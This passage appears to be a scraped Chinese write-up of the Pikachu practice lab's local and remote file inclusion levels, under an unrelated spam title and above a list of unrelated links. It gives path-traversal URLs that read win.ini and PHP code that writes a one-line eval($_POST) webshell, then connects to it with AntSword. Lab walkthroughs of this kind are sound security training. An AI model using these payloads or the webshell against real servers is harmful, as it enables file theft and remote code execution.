当前位置: 首页 > news >正文

股票实时交易网站开发站长工具无吗经典

股票实时交易网站开发,站长工具无吗经典,浏览器主页制作,合肥地区建网站公司参考借鉴 Pikachu靶场之文件包含漏洞详解_pikachu文件包含-CSDN博客 文件包含(CTF教程,Web安全渗透入门)__bilibili File Inclusion(local) 查找废弃隐藏文件 随机选一个然后提交查询 URL中出现filenamefile2.php filename是file2.php&…

参考借鉴

Pikachu靶场之文件包含漏洞详解_pikachu文件包含-CSDN博客

文件包含(CTF教程,Web安全渗透入门)__bilibili

File Inclusion(local) 

查找废弃隐藏文件

随机选一个然后提交查询

URL中出现filename=file2.php

 filename是file2.php,其他文件名可能是filex.php(x是数字)

发现文件名确实是file1.php~file5.php

这套文件里可能有废弃或者隐藏的文件,用burpsuite进行爆破

爆破位置设置为文件名中的数字

payload设置为Numbers,从6到100,步长为1,然后攻击

不同长度的结果有三个,分别代表file6.php、file7.php、file10.php

把上面四个文件名都在浏览器地址栏试一下

发现file6.php是个包含用户名和密码的隐藏文件

file7.php返回了报错,通过这个报错可以知道,文件包含的函数是include()以及包含的文件路径,file10.php也是如此

        

读取不同文件夹文件

由上图可以看出网站根目录是:E:\phpStudy\phpstudy_pro\WWW\     

在此目录下写入一个shell.txt格式的php代码

内容为:<? phpinfo();?>

由于路径参数中有个固定的include/,因此就不能用绝对路径,结合报错信息中泄露的结合报错信息中泄露的fi_local.php文件位置,算出相对路径为 ../../../shell.txt

payload:

http://127.0.0.1/vul/fileinclude/fi_local.php?filename=../../../shell.txt&submit=提交查询

成功读取文件 

         

读取系统文件

结合报错信息中泄露的fi_local.php文件位置,算出相对路径为 C:/../../../../windows/win.ini

payload:

http://127.0.0.1/vul/fileinclude/fi_local.php?filename=C:/../../../../Windows/win.ini&submit=提交查询

成功读取文件 

                

File Inclusion(remote)

allow_url_include=On

修改该目录下的文件  phpstudy_pro\Extensions\php\php7.3.4nts\php.ini

修改文件

重启服务 

测试本地文件包含

发现url中把include()函数的完整参数给出来了,所以除了远程文件包含,

还可以本地文件包含,使用绝对路径

将filename更改为上一关创建的shell.txt的绝对路径

成功读取文件

        

包含有木马的文件

在fi_remote.php文件的同级目录下新建一个文件shell.php,并将一句话木马写入shell.php,将上题添加的shell.txt的文件内容更改为:

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[caker])  ?> ' ); ?>

payload:

http://127.0.0.1/vul/fileinclude/fi_remote.php?filename=E:\phpStudy\phpstudy_pro\WWW\shell.txt&submit=提交查询

没有回显 

目录查看发现shell.php已经写入, 可以用蚁剑进行连接

http://www.yayakq.cn/news/751876/

相关文章:

  • 建筑企业网站有哪些可以自己设计房子室内装修的软件
  • 上海专业做网站的公司有哪些wordpress100万数据
  • 网站建设哪家好采用苏州久远网络邯郸网站改版费用
  • 怎么做电商网站 用户画像wordpress 微信分享插件
  • 北京手机网站建设报价网络媒体设计与制作
  • 东莞招聘网官方网站自己弄个网站
  • 寻找富阳网站建设下载学校网站模板下载安装
  • 橙云的主机支持放两个网站吗中国互联网前100名企业
  • 模版建站WordPress扫码
  • 网站建设阿里云搭建个人网站佛山做网站的公司有哪些
  • 网站备案核验号做网站选服务器带宽
  • 免费自助音乐网站申请友情链接检测659292
  • wordpress网站怎么建wordpress 分词
  • 怀化二手车网站张家港保税区建设规划局网站
  • 购物网站 页面设计大连响应式网站建设
  • 小型门户网站建设方案开发一个app的费用是多少
  • 网站建设连接到百度什么系统做网站最安全
  • 万网 网站建设方案书视频网站开发技术书
  • 信诺盛世网站wordpress地图在哪
  • 网站自己做还是用程序济南找工作哪个网站好
  • 国内空间没备案可以打开网站吗新手制作网站
  • 做网站编辑需要经验吗网站的图片做多大尺寸
  • wordpress网站服务器配置电子商务网站开发的背景
  • 网站如何做搜索引擎优化广告视频拍摄制作
  • 电子商务网站建设分析和总结380元网站建设
  • 专门做详情页的网站两个域名同时指向一个网站
  • 微网站制作提供商推荐无锡seo优化
  • 凡科模板建站长沙网站建设专家
  • 广西南宁网站建设哪家好江苏网站建设定制
  • 个人网站论文摘要代理网址是什么意思